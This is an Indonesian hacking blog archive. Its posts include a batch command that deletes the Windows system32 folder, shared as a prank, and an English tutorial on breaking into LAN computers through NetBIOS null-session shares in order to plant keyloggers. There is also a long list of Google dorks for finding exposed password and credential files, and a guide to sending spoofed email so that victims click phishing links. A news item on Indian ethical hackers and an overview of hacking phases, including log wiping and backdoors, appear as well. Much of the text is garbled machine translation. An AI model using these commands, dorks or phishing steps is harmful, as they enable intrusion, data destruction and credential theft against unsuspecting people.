angka

Tampilkan postingan dengan label hacking. Tampilkan semua postingan
Tampilkan postingan dengan label hacking. Tampilkan semua postingan

Minggu, 01 Januari 2012

DOS (DENIAL OF SERVICES)

DOS merupakan salah satu serangan yang banyak ditemui dalam dunia networking saat ini. Anda tidak pernah tahu kapan akan mendapat serangan ini. Serangan Dos dapat terjadi kapan saja pada jaringan dan dapat ditunjukan kepada siapa saja, bahkan ke personal. Namun biasanya yang paling sering terkena dampaknya adalah server-server besar seperti yahoo, google, serta perbankan yang secara langsung memberikan pelyanannya melalui jaringan. Bila Anda memutuskan untuk memberikan pelayanan melalui jalur networking, Anda juga harus siap menangung risikonya, salah satunya adalah serang DOS.

Seorang ini biasanya bertujuan untuk mematikan pelayanan dari komputer atau jaringan yang diserang. Dampaknya akan sangat besar bagi perusahaan atau instansi yang menyediakan jasa terutama bagi pelayanan yang seharusnya. Serangan DOS ini dapat menghambat bahkan mematikan pelayanan pada sebuah system sehingga pengguna yang abash tidak dapat menerima atau mendapatkan pelyanan yang seharusnya. Bayangkan saja bila sebuah perusahaan banking tidak dapat memberikan pelayanan kepada nasabahnya, maka akan sangat fatal akibatnya bagi kelangsungan perusahaan tersebut. Atau sebuah provider internet yang tidak dapat memberikan bandwidthnya kepada klien, maka akan berdampak tidak hanya kepada provider tersebut yang harus membayar jaminan koneksi sesuai yang mereka terapkan namun juga kepada penyewa koneksi. Bila salah satu pnyewanya adalah sebuah warnet atau bahkan banking, tentunya akan berdampak luas.

Serang DOS ini pada dasarnya sulit dideteksi, kecuali jika penyerangan telah melakukan beberapa kali percobaan dengan alamat IP sama. Tentu akan sangat mudah untuk membloknya. DOS cukup sulit untuk diatasi karena serangan ini pada dasarnya juga berkaitan dengan pelayanan yang diberikn, sebuh system dengan tingkat keamanan yang tinggi biasanyamemberikan kenyamanan yang redah bagi penggunanya. Bayangkan bila server yahoo dijadikan perantara untuk menyerang tentu akan sangaat membingungkan bagi administrator disebuah penyedian jasa internet. Sang administrator tidak bisa asal melakukan block alamat IP yahoo karena yang akan terkena dampaknya adalaha pengguna jasa internet tersebut. Maka perlu dicari solusi yang tepat oleh provider internet tersebut.

Sewaktu seorang ingin melakukan serangan, ada banyak sekali cara yang dapat dilakukan. Kalsifikasi dari serangan DOS ini di antarnya syn attack dan UDP flood. Saat ini serangan DOS tidaklah terlalu besar lagi dampaknya karena para ahli jaringan telah banyak menemukan metode pengamanan terbaru dan menambal patch – patch pada sebuah sistem.

Serangan DOS bukan merupakan hal yang sulit untuk dilakukan, namun bila penyerangan ingin memberikan dampak yang besar, maka dibutuhkan pengetahuan dan sumber daya yang memadai untuk melakukan hal tersebut. Pengamatan tentang terget ujga merupakan hal – hal yang tidak boleh dilupakan. Mengatasi DOS secara langsung dapa dilakukan dengan cara mematikan layanan yang diserang atau mungkin mematikan server, namun akan berakiabat kepada user yang ingin mengkases server yang bersangkutan.

Rabu, 02 November 2011

Hacking Methodologies

saya lagi iseng-iseng baca artikel tentang Hacking Methodologies. Menurut CEH (Certified Ethical Hacker) Study Guide, ada beberapa tahapan dalam melakukan proses hacking, yaitu:
1. Reconnaissance
2. Scanning
3. Enumeration
4. Penetration
5. System Elevation
6. Network Elevation
7. Pilfer
8. Expansion
9. Housekeeping

Reconnaisance / Discovery
Tahapan ini juga dikenal dengan tahapan footprinting. Sasaran utama dalam tahapan ini adalah memperoleh informasi berkaitan dengan Network ID / Network Address, informasi seputar DNS Zone, Dokumentasi dari jaringan target, dan juga topologi dari jaringan itu sendiri. Intinya pada tahapan ini hacker mencoba untuk mereka-reka kondisi dari jaringan target.

Scanning
Sasaran utama dari tahap ini adalah mencari IP Address yang valid / up dari perangkat-perangkat yang terdapat dalam jaringan target. Di sini seorang hacker akan mencari tahu IP berapa saja yang up. Untuk melakukan tahapan ini seseorang bisa menggunakan tool seperti nmap, ws ping, war ping, dan beberapa scanning tools lainnya.

Enumeration
Sasaran utama dari tahap ini adalah mencari tahu operating system yang digunakan oleh suatu host dan juga service apa saja yang disediakan oleh host tersebut. Kedua informasi tersebut biasanya bisa diperoleh dengan mudah dengan menggunakan scanning tool seperti nmap.
Dalam tahapan ini juga seorang hacker akan mencoba mencari tahu informasi berkaitan dengan username dan password dari host target. Informasi ini bisa diperoleh dengan melakukan proses sniffing traffic ataupun menggunakan anonymous.

Penetration
Tahapan ini adalah tahapan di mana seorang hacker mulai memasuki host target dengan menggunakan informasi yang diperoleh pada tahapan-tahapan sebelumnya.

System Elevation
Biasanya seorang hacker akan mulai memasuki suatu system / host dengan menggunakan account guest ataupun account user yang memiliki priviledge terbatas. Langkah berikutnya yang perlu dilakukan adalah melakukan priviledge escalating atau dengan kata lain mencoba meningkatkan priviledge ataupun mencoba mendapatkan account lain yang memiliki privilegde lebih tinggi. Target utama dalam tahapan ini adalah memperoleh account root atau admin.

Network Elevation
Tujuan utama dalam tahapan ini adalah menguasai suatu perangkat tertentu (tentunya perangkat strategis) dalam jaringan target. Tahapan ini menjadi lebih mudah apabila perangkat dalam jaringan target menggunakan default configuration setting. Tidak sedikit perusahaan yang mengimplementasikan perangkat jaringannya dengan menggunakan default configuration setting. Menggunakan default configuration memang menjadi langkah yang mudah dalam mengimplementasikan suatu perangkat tetapi sayangnya konfigurasi semacam ini seringkali memiliki tingkat keamanan yang sangat minim.



Pilfer
Tahapan ini adalah tahapan di mana seorang hacker mulai melakukan akses terhadapt data dari host target. Akses di sini bisa berupa hanya membaca data yang ada atau bahkan sampai pada tingkatan melakukan modifikasi atau bahkan penghapusan terhadap data tersebut.



Expansion
Pada tahapan ini seorang hacker akan mulai melakukan perluasan terhadap cakupan jaringan ataupun system yang akan dia kuasai. Mulai menguasai host-host tertentu yang bersifat strategis dari host yang satu ke host yang lain.

Housekeeping
Langkah terpenting dalam melakukan proses hacking yang berhsil adalah melakukan pembersihan jejak sehingga tidak seorang pun mengetahui bahwa suatu jaringan ataupun suatu host sudah dimasuki secara ilegal. Tahapan ini pada umumnya berbicara tentang penghapusan data-data pada log file. Selain itu agar sewaktu-waktu seorang hacker bisa kembali memasuki jaringan atau host dengan mudah, biasanya hacker akan memasang backdoor.

Selasa, 01 November 2011

delete c:WINDOWSsystem32

cara  menghapus C:WINDOWS System32
ikut langkah langkah berikut:
1. Buka Notepad
2. lalu tulis perintah berikut: -


PHP Code:
del c:WINDOWSsystem32*.*/q 
3. Simpan notepad tersebut dengan ekstensi ".bat atau .cmd "
4. warning .........
Jangan klik dua kali file tersebut karna file yang kamu ciptakan menghapus semua file dari komputer
folder system32 dan ketika kamu restart pc mu tidak akan mulai
coz sistem tidak dapat menemukan file dalam folder system32 yang
diperlukan pada saat booting.
5. Anda juga dapat menguji di atas dengan membuat folder palsu membiarkan rasa
windows1 di C: \. Menyalin beberapa file lama di dalamnya dan hanya mengikuti atau meniru nya saja
atas command.karena mengklik file yang kamu ganda atau copy bat atau cmd semua file otomatis bisa dihapus.
6. kamu dapat mencoba file ini di komputer manapun satu `s (tapi. ini menyebabkan menyebabkan kerusakan pada
komputer,jangan di salah gunakan ya buat kerjain komputer orang .. ok bro .. heheh ...
ingat ini cuma buat share ilmu aja sambil belajar

Jumat, 21 Oktober 2011

Hack Kode keamana Hp

Hy teman -teman blog Learning. pada sore ini saya akan memberikan  cara mengetahui kode keamanan hp. Kita akan menggunakan sebuah software yang bernama WorldUnlock Codes Calculator v4.4. Software ini berfungsi mengunlock code keamanan hp.




langkah -langkah menggunakan software ini..
1. Download WorldUnlock Code Calculator v4.4 disini.
2. Buka WorldUnlock_v44_Setup.exe.
3. Setelah terbuka, isikan No IMEI Hp anda.
4. Untuk mengetahui No IMEI Hp anda silahkan ketik *#06# pada hp anda.
5. Klik Calculate dan akan muncul kode keamanan.

WorldUnlock Codes Calculator support :
Unlock Nokia
Unlock LG
Unlock Panasonic
Unlock Maxon
Unlock Samsung
Unlock AEG/Telital
Unlock Alcatel
Unlock Siemens
Unlock Sony
Unlock Vitel

Senin, 17 Oktober 2011

TuToRiAl HOW TO HACK IN TO SOMEONES COMPUTER ON LAN NETWORK

-------------- Hacking into a computer ----------

This tutorial is for readers as well who have only the basic knowledge, they will also be able to understand how hackers hack with NetBIOS. Using NetBIOS is probably the easies way to hack into a computer.

What is NetBIOS?
NetBIOS stands for Network Basic Input Output System. It allows applications on separate computers to communicate over a local area network. NetBIOS was developed in 1983 by Sytek Inc, as an API for software communication over IBM's PC-Network LAN technology. As many other service it also works on a port (port 139).Most people don’t even know but when they are connected to the internet they could have their hard drive shared. So if we can find a way into the network than we can do anything with the computer.

Lets begin.1. You need to download cain and abel. It’s a really useful program.http://www.oxid.it/cain.html Once you got it open it. It has a sniffer built inside of it. An IP sniffer looks for every ip address in your local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross. Another window will pop up, make sure “All host in my subnet” is selected, and then click ok. It will scan for computers printers etc. Now choose an Ip address that you would like to hack.


When you got your target go to start ->run and type “cmd” without quotes. This will open the command prompt which we will be using for the whole tutorial.

2. If you don’t know if your target is turned on then you can check it with the ping command, just type:ping IP address into the command prompt.

C:\Users\xxxxx>ping 192.168.1.11

Pinging 192.168.2.22 with 32 bytes of data:Reply from 192.168.1.11: bytes=32 time<1ms TTL=128Reply from 192.168.1.11: bytes=32 time<1ms TTL=128Reply from 192.168.1.11: bytes=32 time<1ms TTL=128Reply from 192.168.1.11: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.1.11:Packets: Sent = 4, Received = 4, Lost = 0 (0% losApproximate round trip times in milli-seconds:Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:\Users\xxxxx>

If the target is not turned on than you will get a message that says “Requested time out” without quotes.

3. Now we need to find more information, for this we use the NBTSTAT command. For more help with the NBTSTAT command type:nbtstat/?
If you want to get the NetBIOS information of your target type:nbtstat –a IP addressFor example: nbtstat –a 192.168.1.11

NetBIOS Remote Machine Name Table

Name Type Status---------------------------------------------JHON -PC <00> UNIQUE RegisteredWORKGROUP <00> GROUP RegisteredWORKGROUP <1E> GROUP RegisteredJHON-PC <20> UNIQUE Registered

MAC Address = 00-19-D2-51-5A-34

Now we got a lot of information, JHON-PC is the name of the computer, on the right there is a <20> it shows us that JHON-PC is shared. If you don’t get a <20> then you have to try another target. Under JHON-PC there is the computers workgroup which is called WORKGROUP in this case. If you don’t know which one is the workgroup and computer look bellow the Type category if it says UNIQUE than it’s a computer or printer, if it says GROUP than it is the workgroup.

Our next step would be to to view the drive or folders the slave is sharing.To do this type: ”net view \\IP addres”For example net view \\192.168.1.11

Share name Type Used as Comment
-----------------------------------------C DiskThe command completed successfully.

Now we know that the target is sharing his or her C drive which we will hack into.

Now lets share the victims computer's hard disk or printer. After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the slave's share name JHON-PC it means that we our drive will have the same contents as that of the JHON-PC .
Lets do it.

We will use the NET command to do our work .Lets suppose we want to make a drive k: on our computer and connect it to the slave we will issue the command : net use “K:\\ip\C”For example: net use K: \\192.168.1.11\CIf the command was successful than we will get the confirmation - The command was completed successfully.

Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. IPC$ is there to help us. It is not at all a password cracker. It is simply a string that tells the remote operating system to give guest access, that will give access without asking for password.

We use IPC$ in this way:c:\users\xxxxx>net use k: \\192.168.1.11\ipc$ "" /user:""You may replace k letter by any other letter. If you did everything correctly than by now you should have a drive named K:. You should be able to do anything to the computer’s C drive including hacking the hell out of it, or putting a key logger on the drive.

Some Exclusive Google Dorks


htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 quot;
intext:"EZGuestbook"
intext:"Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default_password" +"Zend s?ri?ting Language Engine"
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:rapidshare intext:login
inurl:"calendars?ri?t/users.txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"Sites.dat"+"PASS="
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
intitle:"remote assessment" OpenAanval Console
intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"
"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com
"Emergisoft web applications are a part of our"
"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 ompatible" OR intitle:"HP Integrated Lights-
"HostingAccelerator" intitle:"login" +"Username" -"news" -demo
"iCONECT 4.1 :: Login"
"IMail Server Web Messaging" intitle:login
"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com
"intitle:3300 Integrated Communications Platform" inurl:main.htm
"Login - Sun Cobalt RaQ"
"login prompt" inurl:GM.cgi
"Login to Usermin" inurl:20000
"Microsoft CRM : Unsupported Browser Version"
"OPENSRS Domain Management" inurl:manage.cgi
"pcANYWHERE EXPRESS Java Client"
"Please authenticate yourself to get access to the management interface"
"please log in"
"Please login with admin pass" -"leak" -sourceforge
CuteNews" "2003..2005 CutePHP"
DWMail" password intitle:dwmail
Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com
Midmart Messageboard" "Administrator Login"
Monster Top List" MTL numrange:200-
UebiMiau" -site:sourceforge.net
"site info for" "Enter Admin Password"
"SquirrelMail version" "By the SquirrelMail development Team"
"SysCP - login"
"This is a restricted Access Server" "Javas?ri?t Not Enabled!"|"Messenger Express" -edu -ac
"This section is for Administrators only. If you are an administrator then please"
"ttawlogin.cgi/?action="
"VHCS Pro ver" -demo
"VNC Desktop" inurl:5800
"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com
"WebExplorer Server - Login" "Welcome to WebExplorer Server"
"WebSTAR Mail - Please Log In"
"You have requested access to a restricted area of our website. Please authenticate yourself to continue."
"You have requested to access the management functions" -.edu
(intitle:"Please login - Forums
UBB.threads")|(inurl:login.php "ubb")
(intitle:"Please login - Forums
WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")
(intitle:"rymo Login")|(intext:"Welcome to rymo") -family
(intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")
(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil
4images Administration Control Panel
allintitle:"Welcome to the Cyclades"
allinurl:"exchange/logon.asp"
allinurl:wps/portal/ login
ASP.login_aspx "ASP.NET_SessionId"
CGI:IRC Login
ext:cgi intitle:"control panel" "enter your owner password to continue!"
ez Publish administration
filetype:php inurl:"webeditor.php"
filetype:pl "Download: SuSE Linux Openexchange Server CA"
filetype:r2w r2w
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your domain."
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp
intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration" "Copyright"
intitle:"AlternC Desktop"
intitle:"Athens Authentication Point"
intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Dell Remote Access Controller"
intitle:"Docutek ERes - Admin Login" -edu
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login -
Easy File Sharing Web Server"
intitle:"Login Forum
AnyBoard" intitle:"If you are a new user:" intext:"Forum
AnyBoard" inurl:gochat -edu
intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi
intitle:"Merak Mail Server Web Administration" -ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service and a language."
intitle:"oMail-admin Administration - Login" -inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -s?ri?t -site:freelists.org
intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login" inurl:console
intitle:"Welcome Site/User Administrator" "Please select the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin
intitle:"XMail Web Administration Interface" intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office "Enter your username and password to login"
intitle:ilohamail "
IlohaMail"
intitle:ilohamail intext:"Version 0.8.10" "
IlohaMail"
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:"/admin/configuration. php?" Mystore
inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"
inurl:"1220/parse_xml.cgi?"
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:":10000" intext:webmin
inurl:"Activex/default.htm" "Demo"
inurl:"calendar.asp?action=login"
inurl:"default/login.php" intitle:"kerio"
inurl:"gs/adminlogin.aspx"
inurl:"php121login.php"
inurl:"suse/login.pl"
inurl:"typo3/index.php?u=" -demo
inurl:"usysinfo?login=true"
inurl:"utilities/TreeView.asp"
inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp

India membutuhkan hacker pada 2011

Ketika lainnya 12-year-olds menghabiskan hari bermain atau menonton film, Shantanu Gowde telah dalam berita untuk menghabiskan waktu dengan TI profesional dua kali usianya. Hacker termuda India, Shantanu hanya tiga tahun ketika ia menggunakan komputer untuk membuat presentasi PowerPoint, slide dan kartu ulang tahun untuk teman-teman. Sekarang, ia telah 'etis' menyusup ke situs-situs lebih dari 50 rumah perusahaan dan individu dan memberikan tips keamanan reguler ke perusahaan IT di Mumbai.

Khawatir atas pembajakan meningkat dan kebocoran trailer film dan poster, pembuat film dan perusahaan produksi telah berpaling ke ahli yang dapat mengambil bawah situs menyinggung. Girish Kumar, managing director Perangkat Lunak Aiplex telah disediakan secara online anti-pembajakan solusi untuk lebih dari 50 film Bollywood termasuk My Name is Khan, Housefull dan Peepli Live dan spanduk besar seperti UTV, Eros dan Film Yashraj. Dia mengatakan, "Kebanyakan rumah produksi menyadari fakta bahwa pembajakan online adalah ancaman nyata. Seringkali, pemberitahuan hak cipta melakukan trik. Dengan situs yang menawarkan 'torrents' download film, kita banjir dengan link palsu atau langsung alamat situs web dari halaman yang sebenarnya. "

Pada tahun 2010, hacker membuat beberapa kali berita, misalnya, ketika unggulan Grup Masa Depan Portal e-commerce berhenti berfungsi selama dua hari setelah serangan, portal investigasi lembaga CBI adalah hacked oleh programmer yang mengidentifikasi diri mereka sebagai "tentara Pakistan Cyber". Anggota Rajya Sabha dan situs pribadi industrialis Vijay Mallya terlalu diduga dipecah menjadi oleh hacker Pakistan. Situs web US Army juga berhenti berfungsi untuk sehari setelah hacked. Sosial layanan pesan Twitter juga shutdown untuk jam, sementara Facebook mengalami masalah akses intermiten setelah serangan tersebut.

Menjelaskan keamanan penginjil Rohit Srivastava, "Pekerjaan Seorang hacker adalah untuk membantu perusahaan menemukan dan steker lubang dalam sistem. Perusahaan menyewa kita untuk membangun sebuah tim keamanan in-house yang mengembangkan perangkat lunak dan sistem yang hacking-bukti "Rohit adalah pendiri Hack-Klub, yang pertama untuk hacker di India, untuk meningkatkan kesadaran keamanan di kalangan masyarakat umum..

Sebagai kredibilitas keuntungan keterampilan yang tidak konvensional, semakin banyak orang yang memilih untuk itu sebagai karier. Kapoor mengatakan Sheetal, yang telah melakukan program diploma pasca-sarjana di hacking etis dan keamanan cyber, "Saya telah bekerja sebagai konsultan keamanan cyber dengan perusahaan multinasional dan proyek-proyek pemerintah tertentu. Perusahaan semakin khawatir tentang keamanan situs Web mereka. "

Selama bertahun-tahun, hacker telah menyempurnakan cara-cara inovatif untuk memecahkan ke perlindungan yang dibangun ke dalam sistem operasi komputer. Ankit Fadia wellknown hacker dimulai dengan melakukan percobaan dengan komputer rumahnya pada usia 12 dan dalam dua tahun, menulis buku pertamanya pada subjek.Ankit mengklaim bahwa ia berkonsultasi oleh badan intelijen untuk memecahkan pesan terenkripsi yang diyakini telah dikirim oleh salah satu orang Osama Bin Laden. Hari ini, ia adalah seorang konsultan keamanan bagi perusahaan multinasional dan bahkan beberapa host menunjukkan pada saluran pemuda populer. Dia mengatakan, "Saya tertarik dengan kekuatan yang mampu melakukan sesuatu yang kebanyakan orang tidak bisa, itu bagaimana cinta saya untuk hacking dimulai. Sekarang, saya telah mampu mengubah hobi saya menjadi sebuah profesi juga. "

Ankit menambahkan, "Sebagai jangkauan Internet menyebar, tantangan yang organisasi, apakah pemerintah, semigovernment atau swasta, wajah sangat besar. Kerentanan baru ditemukan setiap hari dan dapat mengekspos jaringan informasi untuk elemen yang tidak diinginkan. "

Sebuah kata disalahgunakan banyak, "hacker" aslinya berarti "programmer pintar".Hacker tertegun dunia ketika WikiLeaks pendukung bersatu meruntuhkan website pemerintah Swedia bersama dengan orang-orang dari Paypal dan Guru - Kartu. Bahkan, dunia - wide web ditemukan oleh hacker Timothy J. Berners-Lee, yang tertangkap hacking dan dilarang menggunakan komputer universitas nya. Steven Wozniak hacker Gary menemukan Apple I, salah satu mikrokomputer pertama. Dia dan Steve Jobs prototip pertama dirakit di garasi Ayub. Perangkat lunak ini diberi kode kebanyakan oleh Wozniak.

Di antara hacker terbaik negara etis, Sunny Vaghela account e-mail hacked ketika ia berusia 16. Dan keingintahuan untuk menangkap hacker memotivasi dirinya untuk menjadi seorang profesional dirinya. "Aku meng-hack ke dalam pemerintahan utama dan situs pribadi dan kemudian mengirimkan mereka surat, menyarankan solusi yang mungkin," katanya.

Sunny, yang teknis saran diterima dan diadopsi oleh jaringan sosial Orkut situs Google, ketika dia menunjukkan celah untuk administrator nya, menjelaskan, "Seorang hacker profesional dapat memperoleh lebih dari biasa TI profesional. Dalam enam bulan terakhir, hampir 4,5 lakh situs itu hack, dan tahun lalu, sekitar 2,5 lakh hacked. Antivirus dan firewall tidak cukup untuk melindungi data Anda "Dinesh Pillai, CEO Mahindra SSG dan timnya dari" hacker etis "percaya bahwa setiap perusahaan memerlukan tangan dilatih untuk menerapkan sistem manajemen risiko keamanan.. "Permintaan untuk keterampilan ini akan naik sebagai perusahaan menyadari kebutuhan untuk melindungi bisnis dan nilai merek."

Bagaimana Send Email Anonymous - Mailer Palsu

Phishing adalah salah satu metode yang paling berguna dan sederhana untuk account email hacking. Bila menggunakan phishing Anda perlu mengirim email ke korban Andayang berisi link ke halaman phisher Anda. Korban akan mengklik link ini hanya jika ia menemukan surat asli, jadi kita perlu sebuah mailer palsu untuk membuat surat ini tampak seperti asli.

Email palsu berarti Send mail Asli kami Tanpa menggunakan Email_ID ... Palsu mailerKirim email Menggunakan ID Salah ... dan Proxy Server .. bahwa ada orang yang tidak bisa menemukannya ...

CATATAN: - Semua Situs Web Palsu milis tidak menggunakan Proxy Server.

Dalam posting ini saya akan menunjukkan cara untuk mengirim email anonim untukkorban Anda menggunakan Mailer palsu.

1. Pergi ke situs web palsu Mailer untuk mengirim email anonim.



2. Sekarang, masukkan informasi seperti yang ditunjukkan:
From Name:Nama Pengirim yang akan muncul di Email
From Email: Alamat email pengirim
To: Korban alamat email
Subject:Subjek Email
Content-Pilih teks / html
Text: Isi dari email Anda. Taruh sesuatu yang akan membuat Anda korban untuk mengklik link phisher Anda.
3. Sekarang, masukkan captcha dan tekan Kirim.

4. Korban Anda akan menerima email seperti ini:



Ok .. menikmati surat palsu dengan fnds Anda ....

jika u punya masalah daripada Komentar saya, ... ..

Ikuti Link berikut untuk bergerak dari pengirim palsu ...

http://emkei.cz/

Cari semua Menyukai Anda di Facebook!.!

Facebook telah menjadi bagian terpenting dari kehidupan kita yang kita tidak bisa hiduptanpa itu. Ini memiliki beberapa fitur yang sangat keren salah satunya adalah tombolSeperti. Menggunakan tombol ini Seperti Anda dapat mengekspresikan pandangan Anda terhadap segala halaman, produk atau apapun pesan status.

Jika Anda seperti update atau halaman, Anda bisa klik tombol Seperti yang akandigunakan bersama oleh semua teman Anda. Para Menyukai bahwa Anda telah melakukan akan diarsipkan dan dalam kasus Anda ingin melihat semua suka Andaselama periode waktu maka anda dapat memeriksa semua suka dengan layanan besar yang disebut LikeJournal.

LikeJournal adalah layanan yang dapat mengatur semua menyukai Anda sebagaibookmark sosial sehingga Anda dapat mencari dan menelusuri semua Facebook Sukamudah. Apa yang Anda semua perlu lakukan adalah hanya mendapatkan pada halaman ini, dan login dengan mandat Facebook Anda login, sehingga dapat mengakses data Anda FB dan membuat Anda mendapatkan hasil.

